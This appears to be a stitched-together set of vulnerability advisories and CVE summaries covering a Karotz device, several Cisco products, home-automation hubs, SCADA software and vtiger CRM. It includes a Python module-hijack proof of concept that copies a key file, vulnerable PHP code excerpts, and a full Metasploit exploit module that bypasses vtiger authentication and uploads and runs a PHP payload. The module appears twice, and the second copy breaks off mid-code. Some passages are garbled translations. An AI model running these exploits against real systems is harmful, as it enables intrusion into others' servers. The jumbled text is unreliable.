wifi is selected as the method used to connect to the Internet, a python script named "autorunwifi" is run as root to set up the wifi connectivity. This file, along with several others, is placed in the root of a USB flash drive or hard drive. Another file, named "autorunwifi.sig", contains a signature of autorunwifi signed with the private key for Violet, to prevent modifications to the "autorunwifi" script. Since Python first attempts to load modules not built into Python from the same directory as the invoked script, it is possible to override the functionality of imported modules by placing a file with the same basename as the module being imported and an extension of ".py". In this case, it is possible to write a Python script named "simplejson.py" and place it in the same directory as the other setup files, which will cause the contents of simplejson.py to be executed at the beginning of the "autorunwifi" script execution. This attack requires a USB flash drive to be plugged into the Karotz unit, and requires the Karotz to be turned off and on. The following is a proof of concept "simplejson.py" file that will copy the pubring.gpg file from the Karotz onto the inserted USB key, which is processed with MD5 to produce the key used to decrypt the root filesystem for the Karotz: ## simplejson.py import os os.system("cp /karotz/etc/gpg/pubring.gpg /mnt/usbkey") ## end simplejson.py Finding 2: API Session Token Passed in Cleartext *****Credit: Daniel Crowley of Trustwave SpiderLabs CVE: CVE-2013-4868 There are two kinds of applications for the Karotz: hosted and external. Hosted applications are stored and run on the Karotz itself. External applications run outside the Karotz unit and control the Karotz through an api at api.karotz.com. Both types of applications must specifically request to use parts of the karotz in the manifest file of their application package. For instance, if your application uses the webcam and ears, you must specify in your application manifest that these will be used by your application before they will be available to your application. The control is performed over plaintext HTTP. For instance, if the application uses the webcam, a video could be captured using the webcam and sent to an arbitrary server. Vendor Response: No response received. Remediation Steps: No official patch is available. To limit exposure, network access to these devices should be limited to authorized personnel through the use of Access Control Lists and proper network segmentation. Revision History: 06/19/13 - Attempt to contact vendor 07/10/13 - Attempt to contact vendor 07/12/13 - Attempt to contact vendor 08/01/13 - Advisory published Additional Credits: Discussion of Python module loading behavior and initial suggestion of application to Karotz by Jennifer Savage References 1. http://www.karotz.com 2. http://savagejen.github.io/blog/2013/04/28/python-module-hijacking/ About Trustwave: Trustwave is the leading provider of on-demand and subscription-based information security and payment card industry compliance management solutions to businesses and government entities throughout the world. For organizations faced with today's challenging data security and compliance environment, Trustwave provides a unique approach with comprehensive solutions that include its flagship TrustKeeper compliance management software and other proprietary security solutions. Trustwave has helped thousands of organizations--ranging from Fortune 500 businesses and large financial institutions to small and medium-sized retailers--manage compliance and secure their network infrastructure, data communications and critical information assets. Trustwave is headquartered in Chicago with offices throughout North America, South America, Europe, Africa, China and Australia. For more information, visit https://www.trustwave.com About Trustwave SpiderLabs: SpiderLabs(R) is the advanced security team at Trustwave focused on application security, incident response, penetration testing, physical security and security research. The team has performed over a thousand incident investigations, thousands of penetration tests and hundreds of application security tests globally. In addition, the SpiderLabs Research team provides intelligence through bleeding-edge research and proof of concept tool development to enhance Trustwave's products and services. https://www.trustwave.com/spiderlabs Disclaimer: The information provided in this advisory is provided "as is" without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. ________________________________ This transmission may contain information that is privileged, confidential, and/or exempt from disclosure under applicable law. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or use of the information contained herein (including any reliance thereon) is STRICTLY PROHIBITED. If you received this transmission in error, please immediately contact the sender and destroy the material in its entirety, whether in electronic or hard copy format

The OSPF implementation in Cisco IOS 12.0 through 12.4 and 15.0 through 15.3, IOS-XE 2.x through 3.9.xS, ASA and PIX 7.x through 9.1, FWSM, NX-OS, and StarOS before 14.0.50488 does not properly validate Link State Advertisement (LSA) type 1 packets before performing operations on the LSA database, which allows remote attackers to cause a denial of service (routing disruption) or obtain sensitive packet information via a (1) unicast or (2) multicast packet, aka Bug IDs CSCug34485, CSCug34469, CSCug39762, CSCug63304, and CSCug39795. Open Shortest Path First (OSPF) The protocol specifications include: Link State Advertisement (LSA) There is a problem with the identification of. OSPF Specified in the protocol LSA Is LS Type , Advertising Router and Link State ID is included. OSPF In the provisions of router-LSA of Link State ID When Advertising Router Are supposed to be set to the same value. These two values are different, crafted router-LSA The contents of the routing table may be altered by receiving.The expected impact varies depending on each product and implementation. (DoS) An attacker may be able to attack you or direct network traffic to another router. OSPF is a routing protocol defined by RFC 2328 and is designed to manage IP routes in an AS. OSPF packets use the 89 IP protocol number. A vulnerability exists in the related OSPF routing protocol LSA database. Several Cisco products are affected by this vulnerability. This vulnerability allows unverified attackers to fully control the OSPF AS domain routing table, discard blackhole traffic, and intercept communications, which can lead to denial of service attacks. An attacker can inject a specially crafted OSPF packet to trigger the vulnerability. Successful exploitation of the vulnerability can \"clean\" the routing table on the target router and propagate the specially crafted OSPF LSA type 1 update to the entire OSPF AS domain. To exploit this vulnerability, an attacker must accurately determine certain parameters in the LSA data on the target router. This vulnerability can only be triggered by sending a specially crafted unicast or multicast LSA type 1 message. The other LSA type packets cannot trigger the vulnerability. The OSPFv3 and Fabric Shortest Path First (FSPF) protocols do not affect this vulnerability. This may aid in further attacks. IOS, IOS-XE, and NX-OS are all operating systems developed for their network devices. Both ASA and FWSM are firewall devices. The following products and versions are affected: Cisco IOS Releases 12.0 to 12.4 and 15.0 to 15.3, IOS-XE Releases 2.x to 3.9.xS, ASA and PIX Releases 7.x to 9.1, FWSM, NX-OS, StarOS 14.0. Versions prior to 50488

The C-Series Rack Server component 1.4 in Cisco Unified Computing System (UCS) does not properly restrict inbound access to ports, which allows remote attackers to cause a denial of service (Integrated Management Controller reboot or hang) via crafted packets, as demonstrated by nmap, aka Bug ID CSCtx19850. Cisco Unified Computing System is prone to a remote denial-of-service vulnerability. An attacker can exploit this issue to cause an affected device to reload, denying service to legitimate users. This issue is tracked by Cisco Bug ID CSCtx19850. The system integrates network, computing and virtualization resources into one platform by extensively adopting virtualization technology

Cisco WebEx Meetings Server does not check whether a user account is active, which allows remote authenticated users to bypass intended access restrictions by performing meeting operations after account deactivation, aka Bug ID CSCuh33315. Cisco WebEx is a web conferencing solution. An attacker can exploit this issue to bypass the authentication mechanism and gain unauthorized access to vulnerable application. This may lead to further attacks. This issue is tracked by Cisco Bug ID CSCuh33315. Cisco WebEx Meetings Server (CWMS) is a set of multi-functional conference solutions including audio, video and Web conference in Cisco's WebEx conference solution

vtiger CRM 5.4.0 and earlier contain local file-include vulnerabilities in 'customerportal.php' which allows remote attackers to view files and execute local script code. vtiger CRM Contains an injection vulnerability.Information is acquired, information is falsified, and denial of service (DoS) May be in a state. vtiger CRM is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input. This may allow the attacker to compromise the application; other attacks are also possible. vtiger CRM 5.4.0 and prior are vulnerable. Vtiger CRM is a customer relationship management system (CRM) based on SugarCRM developed by American Vtiger Company. The management system provides functions such as management, collection, and analysis of customer information. The vulnerability comes from the fact that the program does not properly filter the input submitted by the user. --------------------------------------------------------------------------------- vtiger CRM <= 5.4.0 (customerportal.php) Two Local File Inclusion Vulnerabilities --------------------------------------------------------------------------------- [-] Software Link: http://www.vtiger.com/ [-] Affected Versions: [1] All versions from 5.1.0 to 5.4.0. [2] All versions from 5.2.0 to 5.4.0. [-] Vulnerability Description: 1) The vulnerable code is located in the get_list_values SOAP method defined in /soap/customerportal.php: 1528. function get_list_values($id,$module,$sessionid,$only_mine='true') 1529. { 1530. require_once('modules/'.$module.'/'.$module.'.php'); 1531. require_once('include/utils/UserInfoUtil.php'); 1532. global $adb,$log,$current_user; 1533. $log->debug("Entering customer portal function get_list_values"); 2) The vulnerable code is located in the get_project_components SOAP method defined in /soap/customerportal.php: 2778. function get_project_components($id,$module,$customerid,$sessionid) { 2779. require_once("modules/$module/$module.php"); 2780. require_once('include/utils/UserInfoUtil.php'); 2781. 2782. global $adb,$log; 2783. $log->debug("Entering customer portal function get_project_components .."); The vulnerabilities exist because these methods fail to properly validate input passed through the "module" parameter, that is being used in a call to the require_once() function (lines 1530 and 2779). This might be exploited to include arbitrary local files containing malicious PHP code. Successful exploitation of these vulnerabilities requires the application running on PHP < 5.3.4, because a null byte injection is required. [-] Solution: Apply the vendor patch:http://www.vtiger.com/blogs/?p=1467 [-] Disclosure Timeline: [13/01/2013] - Vendor notified [06/02/2013] - Vendor asked feedback abouthttp://trac.vtiger.com/cgi-bin/trac.cgi/changeset/13848 [05/03/2013] - Feedback provided to the vendor [26/03/2013] - Vendor patch released [18/04/2013] - CVE number requested [20/04/2013] - CVE number assigned [01/08/2013] - Public disclosure [-] CVE Reference: The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2013-3212 to these vulnerabilities. [-] Credits: Vulnerabilities discovered by Egidio Romano. [-] Original Advisory: http://karmainsecurity.com/KIS-2013-05

vtiger CRM 5.4.0 and earlier contain an Authentication Bypass Vulnerability due to improper authentication validation in the validateSession function. vtiger CRM Contains an authentication vulnerability.Information is acquired, information is falsified, and denial of service (DoS) May be in a state. vtiger CRM is prone to an authentication-bypass vulnerability. An attacker can exploit this issue to bypass the authentication mechanism and perform unauthorized actions. This may aid in further attacks. vtiger CRM 5.4.0 and prior are vulnerable. Vtiger CRM is a customer relationship management system (CRM) based on SugarCRM developed by American Vtiger Company. The management system provides functions such as management, collection, and analysis of customer information. [-] Vulnerability Description: The vulnerable code is located in the validateSession() function, which is defined in multiple SOAP services: function validateSession($username, $sessionid) { global $adb,$current_user; $adb->println("Inside function validateSession($username, $sessionid)"); require_once("modules/Users/Users.php"); $seed_user = new Users(); $id = $seed_user->retrieve_user_id($username); $server_sessionid = getServerSessionId($id); $adb->println("Checking Server session id and customer input session id ==> $server_sessionid == $sessionid"); if($server_sessionid == $sessionid) { $adb->println("Session id match. Authenticated to do the current operation."); return true; } else { $adb->println("Session id does not match. Not authenticated to do the current operation."); return false; } } The vulnerability exists because the "sessionid" parameter isn't properly validated before being compared with the $server_sessionid variable, which is the value returned by the getServerSessionId() function. If called with an invalid session ID, then this function will return "null", in this case the validateSession() will return "true" if the "sessionid" parameter is set to 0, "false", or "null". by calling a SOAP method without providing the "username" and "sessionid" parameters. [-] Solution: Apply the vendor patch:http://www.vtiger.com/blogs/?p=1467 [-] Disclosure Timeline: [13/01/2013] - Vendor notified [06/02/2013] - Vendor asked feedback abouthttp://trac.vtiger.com/cgi-bin/trac.cgi/changeset/13848 [05/03/2013] - Feedback provided to the vendor [26/03/2013] - Vendor patch released [18/04/2013] - CVE number requested [20/04/2013] - CVE number assigned [01/08/2013] - Public disclosure [-] CVE Reference: The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2013-3215 to this vulnerability. [-] Credits: Vulnerability discovered by Egidio Romano. [-] Original Advisory: http://karmainsecurity.com/KIS-2013-08 . ## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'rexml/document' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include REXML include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'vTiger CRM SOAP AddEmailAttachment Arbitrary File Upload', 'Description' => %q{ vTiger CRM allows an user to bypass authentication when requesting SOAP services. In addition, arbitrary file upload is possible through the AddEmailAttachment SOAP service. By combining both vulnerabilities an attacker can upload and execute PHP code. This module has been tested successfully on vTiger CRM v5.4.0 over Ubuntu 10.04 and Windows 2003 SP2. }, 'Author' => [ 'Egidio Romano', # Vulnerability discovery 'juan vazquez' # msf module ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2013-3214' ], [ 'CVE', '2013-3215' ], [ 'OSVDB', '95902' ], [ 'OSVDB', '95903' ], [ 'BID', '61558' ], [ 'BID', '61559' ], [ 'EDB', '27279' ], [ 'URL', 'http://karmainsecurity.com/KIS-2013-07' ], [ 'URL', 'http://karmainsecurity.com/KIS-2013-08' ] ], 'Privileged' => false, 'Platform' => ['php'], 'Arch' => ARCH_PHP, 'Payload' => { # Arbitrary big number. The payload is sent base64 encoded # into a POST SOAP request 'Space' => 262144, # 256k 'DisableNops' => true }, 'Targets' => [ [ 'vTigerCRM v5.4.0', { } ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Mar 26 2013')) register_options( [ OptString.new('TARGETURI', [ true, "Base vTiger CRM directory path", '/vtigercrm/']) ], self.class) end def check test_one = check_email_soap("admin", rand_text_alpha(4 + rand(4))) res = send_soap_request(test_one) unless res and res.code == 200 and res.body.to_s =~ /<return xsi:nil="true" xsi:type="xsd:string"\/>/ return Exploit::CheckCode::Unknown end test_two = check_email_soap("admin") res = send_soap_request(test_two) if res and res.code == 200 and (res.body.blank? or res.body.to_s =~ /<return xsi:type="xsd:string">.*<\/return>/) return Exploit::CheckCode::Vulnerable end return Exploit::CheckCode::Safe end def exploit file_name = rand_text_alpha(rand(10)+6) + '.php' php = %Q|<?php #{payload.encoded} ?>| soap = add_attachment_soap(file_name, php) res = send_soap_request(soap) print_status("#{peer} - Uploading payload...") if res and res.code == 200 and res.body.to_s =~ /<return xsi:type="xsd:string">.*<\/return>/ print_good("#{peer} - Upload successfully uploaded") register_files_for_cleanup(file_name) else fail_with(Failure::Unknown, "#{peer} - Upload failed") end print_status("#{peer} - Executing payload...") send_request_cgi({'uri' => normalize_uri(target_uri.path, 'soap', file_name)}, 0) end def add_attachment_soap(file_name, file_data) xml = Document.new xml.add_element( "soapenv:Envelope", { 'xmlns:xsi' => "http://www.w3.org/2001/XMLSchema-instance", 'xmlns:xsd' => "http://www.w3.org/2001/XMLSchema", 'xmlns:soapenv' => "http://schemas.xmlsoap.org/soap/envelope/", 'xmlns:crm' => "http://www.vtiger.com/products/crm" }) xml.root.add_element("soapenv:Header") xml.root.add_element("soapenv:Body") body = xml.root.elements[2] body.add_element( "crm:AddEmailAttachment", { 'soapenv:encodingStyle' => "http://schemas.xmlsoap.org/soap/encoding/" }) crm = body.elements[1] crm.add_element("emailid", {'xsi:type' => 'xsd:string'}) crm.add_element("filedata", {'xsi:type' => 'xsd:string'}) crm.add_element("filename", {'xsi:type' => 'xsd:string'}) crm.add_element("filesize", {'xsi:type' => 'xsd:string'}) crm.add_element("filetype", {'xsi:type' => 'xsd:string'}) crm.add_element("username", {'xsi:type' => 'xsd:string'}) crm.add_element("session", {'xsi:type' => 'xsd:string'}) crm.elements['emailid'].text = rand_text_alpha(4+rand(4)) crm.elements['filedata'].text = "MSF_PAYLOAD" crm.elements['filename'].text = "MSF_FILENAME" crm.elements['filesize'].text = file_data.length.to_s crm.elements['filetype'].text = "php" crm.elements['username'].text = rand_text_alpha(4+rand(4)) xml_string = xml.to_s xml_string.gsub!(/MSF_PAYLOAD/, Rex::Text.encode_base64(file_data)) xml_string.gsub!(/MSF_FILENAME/, "../../../../../../#{file_name}") return xml_string end def check_email_soap(user_name = "", session = "") xml = Document.new xml.add_element( "soapenv:Envelope", { 'xmlns:xsi' => "http://www.w3.org/2001/XMLSchema-instance", 'xmlns:xsd' => "http://www.w3.org/2001/XMLSchema", 'xmlns:soapenv' => "http://schemas.xmlsoap.org/soap/envelope/", 'xmlns:crm' => "http://www.vtiger.com/products/crm" }) xml.root.add_element("soapenv:Header") xml.root.add_element("soapenv:Body") body = xml.root.elements[2] body.add_element( "crm:CheckEmailPermission", { 'soapenv:encodingStyle' => "http://schemas.xmlsoap.org/soap/encoding/" }) crm = body.elements[1] crm.add_element("username", {'xsi:type' => 'xsd:string'}) crm.add_element("session", {'xsi:type' => 'xsd:string'}) crm.elements['username'].text = user_name crm.elements['session'].text = session xml.to_s end def send_soap_request(soap_data) res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'soap', 'vtigerolservice.php'), 'method' => 'POST', 'ctype' => 'text/xml; charset=UTF-8', 'data' => soap_data }) return res end end

MiCasaVerde VeraLite with firmware 1.5.408 allows remote attackers to send HTTP requests to intranet servers via the url parameter to cgi-bin/cmh/proxy.sh, related to a Server-Side Request Forgery (SSRF) issue. MiCasaVerde VeraLite Contains a server-side request forgery vulnerability.Information is acquired, information is falsified, and denial of service (DoS) May be in a state. Mi Casa Verde VeraLite is a home gateway controller device from Mi Casa Verde, Hong Kong, China. The device can control the home appliances connected to the home Wi-Fi network through a computer or mobile phone. There is a security bypass vulnerability in Mi Casa Verde VeraLite. An attacker can exploit a vulnerability to bypass specific security restrictions and perform unauthorized operations

INSTEON Hub 2242-222 lacks Web and API authentication. INSTEON Hub Contains an improper default permissions vulnerability.Information is acquired, information is falsified, and denial of service (DoS) May be in a state. The INSTEON Hub is used by users to control automatic devices in the home over the network. INSTEON Hub lacks proper validation for web interface access and API calls, allowing remote attackers to exploit the vulnerability to unauthorized control devices and perform various operations. INSTEON Hub is prone to multiple security-bypass vulnerabilities. An attacker may exploit these issues to bypass certain security restrictions and perform unauthorized actions. INSTEON Hub 2242-222 is vulnerable; other versions may also be affected

ClearSCADA is an integrated SCADA host platform that includes a rotation training engine, real-time database, web server, alarm processor and reporting software. ClearSCADA handles a WEB request with an error that allows a remote attacker to exploit a vulnerability to submit a malicious request, trigger an exception, and crash the application. ClearSCADA is prone to a denial-of-service vulnerability. An attacker can exploit this issue to trigger an exception and cause denial-of-service condition

The master-station DNP3 driver before driver19.exe, and Beta2041.exe, in IOServer allows remote attackers to cause a denial of service (infinite loop) via crafted DNP3 packets to TCP port 20000. IOServer is a Windows-based OPC server that allows OPC clients such as human-machine interfaces and monitoring and data acquisition systems to exchange factory data with programmable logic circuits. The IOServer driver does not verify or correctly verify the input on the primary server on port 20000/TCP, which can affect the control flow or database flow of the program. When an attacker can submit a special request to make the IOServer enter an infinite loop without exiting, you need to manually restart to get the normal function. Multiple IOServer drivers are prone to a remote denial-of-service vulnerability. This will result in a denial-of-service condition

Multiple SQL injection vulnerabilities in vTiger CRM 5.0.0 through 5.4.0 allow remote attackers to execute arbitrary SQL commands via the (1) picklist_name parameter in the get_picklists method to soap/customerportal.php, (2) where parameter in the get_tickets_list method to soap/customerportal.php, or (3) emailaddress parameter in the SearchContactsByEmail method to soap/vtigerolservice.php; or remote authenticated users to execute arbitrary SQL commands via the (4) emailaddress parameter in the SearchContactsByEmail method to soap/thunderbirdplugin.php. Vtiger CRM Is SQL An injection vulnerability exists.By any third party, via the following parameters SQL The command may be executed. (4) soap/thunderbirdplugin.php of SearchContactsByEmail In the method emailaddress Parameters. vtiger CRM is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query. Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. vtiger CRM 5.0.0 through versions 5.4.0 are vulnerable. Vtiger CRM is a customer relationship management system (CRM) based on SugarCRM developed by American Vtiger Company. The management system provides functions such as management, collection, and analysis of customer information. The vulnerability comes from the fact that the soap/customerportal.php script does not correctly filter the 'picklist_name' parameter in the get_picklists method; the soap/customerportal.php script does not correctly filter the get_tickets_list method The 'where' parameter; the soap/vtigerolservice.php script does not correctly filter the 'emailaddress' parameter in the SearchContactsByEmail method; the soap/thunderbirdplugin.php script does not correctly filter the 'emailaddress' parameter in the SearchContactsByEmail method. [-] Vulnerability Description: 1) The vulnerable code is located in the get_picklists SOAP method defined in /soap/customerportal.php: 1177. $id = $input_array['id']; 1178. $sessionid = $input_array['sessionid']; 1179. $picklist_name = $adb->sql_escape_string($input_array['picklist_name']); 1180. 1181. if(!validateSession($id,$sessionid)) 1182. return null; 1183. 1184. $picklist_array = Array(); 1185. 1186. $admin_role = 'H2'; 1187. $userid = getPortalUserid(); 1188. $roleres = $adb->pquery("SELECT roleid from vtiger_user2role where userid = ?", array($userid)); 1189. $RowCount = $adb->num_rows($roleres); 1190. if($RowCount > 0){ 1191. $admin_role = $adb->query_result($roleres,0,'roleid'); 1192. } 1193. 1194. $res = $adb->pquery("select vtiger_". $picklist_name.".* from vtiger_". $picklist_name." inner join [...] User input passed through the "picklist_name" parameter seems to be correctly sanitised by the sql_escape_string() method, but the vulnerability exists because it's used in the query at line 1194 without single or double quotes. This can be exploited to conduct blind SQL injection attacks. 2) The vulnerable code is located in the get_tickets_list SOAP method defined in /soap/customerportal.php: 654. $id = $input_array['id']; 655. $only_mine = $input_array['onlymine']; 656. $where = $input_array['where']; //addslashes is already added with where condition fields in portal itself 657. $match = $input_array['match']; 658. $sessionid = $input_array['sessionid']; 659. 660. if(!validateSession($id,$sessionid)) 661. return null; 662. 663. // Prepare where conditions based on search query 664. $join_type = ''; 665. $where_conditions = ''; 666. if(trim($where) != '') { 667. if($match == 'all' || $match == '') { 668. $join_type = " AND "; 669. } elseif($match == 'any') { 670. $join_type = " OR "; 671. } 672. $where = explode("&&&",$where); 673. $where_conditions = implode($join_type, $where); [...] 707. $query = "SELECT vtiger_troubletickets.*, vtiger_crmentity.smownerid,vtiger_crmentity.createdtime, [...] 708. FROM vtiger_troubletickets 709. INNER JOIN vtiger_crmentity ON vtiger_crmentity.crmid = vtiger_troubletickets.ticketid AND [...] 710. WHERE vtiger_troubletickets.parent_id IN (". generateQuestionMarks($entity_ids_list) .")"; 711. // Add conditions if there are any search parameters 712. if ($join_type != '' && $where_conditions != '') { 713. $query .= " AND (".$where_conditions.")"; 714. } User input passed through the "where" parameter isn't properly validated before being used in a SQL query at line 713. This can be exploited to conduct SQL injection attacks. 3) The vulnerable code is located in the SearchContactsByEmail SOAP method defined in /soap/thunderbirdplugin.php: 186. function SearchContactsByEmail($username,$password,$emailaddress) 187. { 188. if(authentication($username,$password)) 189. { 190. require_once('modules/Contacts/Contacts.php'); 191. 192. $seed_contact = new Contacts(); 193. $output_list = Array(); 194. 195. $response = $seed_contact->get_searchbyemailid($username,$emailaddress); User input passed through the "emailaddress" parameter isn't properly validated before being used in a call to the Contacts::get_searchbyemailid() method at line 195. This can be exploited to conduct SQL injection attacks. Successful exploitation of this vulnerability requires authentication. 4) The vulnerable code is located in the SearchContactsByEmail SOAP method defined in /soap/vtigerolservice.php: 282. function SearchContactsByEmail($username,$session,$emailaddress) 283. { 284. if(!validateSession($username,$session)) 285. return null; 286. require_once('modules/Contacts/Contacts.php'); 287. 288. $seed_contact = new Contacts(); 289. $output_list = Array(); 290. 291. $response = $seed_contact->get_searchbyemailid($username,$emailaddress); User input passed through the "emailaddress" parameter isn't properly validated before being used in a call to the Contacts::get_searchbyemailid() method at line 291. This can be exploited to conduct SQL injection attacks. Successful exploitation of this vulnerability requires knowledge of a valid username. [-] Solution: Apply the vendor patch:http://www.vtiger.com/blogs/?p=1467 [-] Disclosure Timeline: [13/01/2013] - Vendor notified [06/02/2013] - Vendor asked feedback abouthttp://trac.vtiger.com/cgi-bin/trac.cgi/changeset/13848 [05/03/2013] - Feedback provided to the vendor [26/03/2013] - Vendor patch released [18/04/2013] - CVE number requested [20/04/2013] - CVE number assigned [01/08/2013] - Public disclosure [-] CVE Reference: The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2013-3213 to these vulnerabilities. [-] Credits: Vulnerabilities discovered by Egidio Romano. [-] Original Advisory: http://karmainsecurity.com/KIS-2013-06

vtiger CRM 5.4.0 and earlier contain a PHP Code Injection Vulnerability in 'vtigerolservice.php'. vtiger CRM Contains an injection vulnerability.Information is acquired, information is falsified, and denial of service (DoS) May be in a state. An attacker can exploit this issue to inject and execute arbitrary PHP code in the context of the affected application. This may facilitate a compromise of the application and the underlying system; other attacks are also possible. vtiger CRM 5.4.0 and prior are vulnerable. Vtiger CRM is a customer relationship management system (CRM) based on SugarCRM developed by American Vtiger Company. The management system provides functions such as management, collection, and analysis of customer information. [-] Vulnerability Description: The vulnerable code is located in the AddEmailAttachment SOAP method defined in /soap/vtigerolservice.php: 458. function AddEmailAttachment($emailid,$filedata,$filename,$filesize,$filetype,$username,$session) 459. { 460. if(!validateSession($username,$session)) 461. return null; 462. global $adb; 463. require_once('modules/Users/Users.php'); 464. require_once('include/utils/utils.php'); 465. $filename = preg_replace('/\s+/', '_', $filename);//replace space with _ in filename 466. $date_var = date('Y-m-d H:i:s'); 467. 468. $seed_user = new Users(); 469. $user_id = $seed_user->retrieve_user_id($username); 470. 471. $crmid = $adb->getUniqueID("vtiger_crmentity"); 472. 473. $upload_file_path = decideFilePath(); 474. 475. $handle = fopen($upload_file_path.$crmid."_".$filename,"wb"); 476. fwrite($handle,base64_decode($filedata),$filesize); 477. fclose($handle); The vulnerability exists because this method fails to properly validate input passed through the "filedata" and "filename" parameters, which are used to write an "email attachment" in the storage directory (lines 475-477). [-] Solution: The patch provided by the vendor (http://www.vtiger.com/blogs/?p=1467) doesn't fix completely this vulnerability, because a remote authenticated user can still be able to inject and execute arbitrary code. [*] The vendor was alerted about this when the feedback has been provided. [-] Disclosure Timeline: [13/01/2013] - Vendor notified [06/02/2013] - Vendor asked feedback abouthttp://trac.vtiger.com/cgi-bin/trac.cgi/changeset/13848 [05/03/2013] - Feedback provided to the vendor [*] [26/03/2013] - Vendor patch released [18/04/2013] - CVE number requested [20/04/2013] - CVE number assigned [01/08/2013] - Public disclosure [-] CVE Reference: The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2013-3214 to this vulnerability. [-] Credits: Vulnerability discovered by Egidio Romano. [-] Original Advisory: http://karmainsecurity.com/KIS-2013-07 . ## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'rexml/document' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include REXML include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'vTiger CRM SOAP AddEmailAttachment Arbitrary File Upload', 'Description' => %q{ vTiger CRM allows an user to bypass authentication when requesting SOAP services. In addition, arbitrary file upload is possible through the AddEmailAttachment SOAP service. This module has been tested successfully on vTiger CRM v5.4.0 over Ubuntu 10.04 and Windows 2003 SP2. }, 'Author' => [ 'Egidio Romano', # Vulnerability discovery 'juan vazquez' # msf module ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2013-3214' ], [ 'CVE', '2013-3215' ], [ 'OSVDB', '95902' ], [ 'OSVDB', '95903' ], [ 'BID', '61558' ], [ 'BID', '61559' ], [ 'EDB', '27279' ], [ 'URL', 'http://karmainsecurity.com/KIS-2013-07' ], [ 'URL', 'http://karmainsecurity.com/KIS-2013-08' ] ], 'Privileged' => false, 'Platform' => ['php'], 'Arch' => ARCH_PHP, 'Payload' => { # Arbitrary big number. The payload is sent base64 encoded # into a POST SOAP request 'Space' => 262144, # 256k 'DisableNops' => true }, 'Targets' => [ [ 'vTigerCRM v5.4.0', { } ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Mar 26 2013')) register_options( [ OptString.new('TARGETURI', [ true, "Base vTiger CRM directory path", '/vtigercrm/']) ], self.class) end def check test_one = check_email_soap("admin", rand_text_alpha(4 + rand(4))) res = send_soap_request(test_one) unless res and res.code == 200 and res.body.to_s =~ /<return xsi:nil="true" xsi:type="xsd:string"\/>/ return Exploit::CheckCode::Unknown end test_two = check_email_soap("admin") res = send_soap_request(test_two) if res and res.code == 200 and (res.body.blank? or res.body.to_s =~ /<return xsi:type="xsd:string">.*<\/return>/) return Exploit::CheckCode::Vulnerable end return Exploit::CheckCode::Safe end def exploit file_name = rand_text_alpha(rand(10)+6) + '.php' php = %Q|<?php #{payload.encoded} ?>| soap = add_attachment_soap(file_name, php) res = send_soap_request(soap) print_status("#{peer} - Uploading payload...") if res and res.code == 200 and res.body.to_s =~ /<return xsi:type="xsd:string">.*<\/return>/ print_good("#{peer} - Upload successfully uploaded") register_files_for_cleanup(file_name) else fail_with(Failure::Unknown, "#{peer} - Upload failed") end print_status("#{peer} - Executing payload...") send_request_cgi({'uri' => normalize_uri(target_uri.path, 'soap', file_name)}, 0) end def add_attachment_soap(file_name, file_data) xml = Document.new xml.add_element( "soapenv:Envelope", { 'xmlns:xsi' => "http://www.w3.org/2001/XMLSchema-instance", 'xmlns:xsd' => "http://www.w3.org/2001/XMLSchema", 'xmlns:soapenv' => "http://schemas.xmlsoap.org/soap/envelope/", 'xmlns:crm' => "http://www.vtiger.com/products/crm" }) xml.root.add_element("soapenv:Header") xml.root.add_element("soapenv:Body") body = xml.root.elements[2] body.add_element( "crm:AddEmailAttachment", { 'soapenv:encodingStyle' => "http://schemas.xmlsoap.org/soap/encoding/" }) crm = body.elements[1] crm.add_element("emailid", {'xsi:type' => 'xsd:string'}) crm.add_element("filedata", {'xsi:type' => 'xsd:string'}) crm.add_element("filename", {'xsi:type' => 'xsd:string'}) crm.add_element("filesize", {'xsi:type' => 'xsd:string'}) crm.add_element("filetype", {'xsi:type' => 'xsd:string'}) crm.add_element("username", {'xsi:type' => 'xsd:string'}) crm.add_element("session", {'xsi:type' => 'xsd:string'}) crm.elements['emailid'].text = rand_text_alpha(4+rand(4)) crm.elements['filedata'].text = "MSF_PAYLOAD" crm.elements['filename'].text = "MSF_FILENAME" crm.elements['filesize'].text = file_data.length.to_s crm.elements['filetype'].text = "php" crm.elements['username'].text = rand_text_alpha(4+rand(4)) xml_string = xml.to_s xml_string.gsub!(/MSF_PAYLOAD/, Rex::Text.encode_base64(file_data)) xml_string.gsub!(/MSF_FILENAME/, "../../../../../../#{file_name}") return xml_string end def check_email_soap(user_name = "", session = "") xml = Document.new xml.add_element( "soapenv:Envelope", { 'xmlns:xsi' => "http://www.w3.org/2001/XMLSchema-instance", 'xmlns:xsd' => "http://www.w3.org/2001/XMLSchema", 'xmlns:soapenv' => "http://schemas.xmlsoap.org/soap/envelope/", 'xmlns:crm' => "http://www.vtiger.com/products/crm" }) xml.root.add_element("soapenv:Header") xml.root.add_element("soapenv:Body") body = xml.root.elements[2] body.add_element( "crm:CheckEmailPermission", { 'soapenv:encodingStyle' => 